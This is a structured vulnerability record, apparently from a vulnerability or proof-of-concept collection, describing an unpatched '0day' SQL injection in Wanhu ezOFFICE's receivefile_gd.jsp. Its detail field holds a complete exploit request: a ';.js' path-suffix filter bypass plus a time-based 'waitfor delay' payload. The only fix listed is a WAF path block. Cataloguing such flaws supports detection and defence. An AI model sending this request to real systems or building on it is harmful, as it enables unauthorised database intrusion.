vendor = "万户"
name = "万户 ezOFFICE receivefile_gd.jsp SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp"
detail = "GET /defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp;.js?recordId=1;waitfor+delay+'0:0:5'--+ HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "0day"
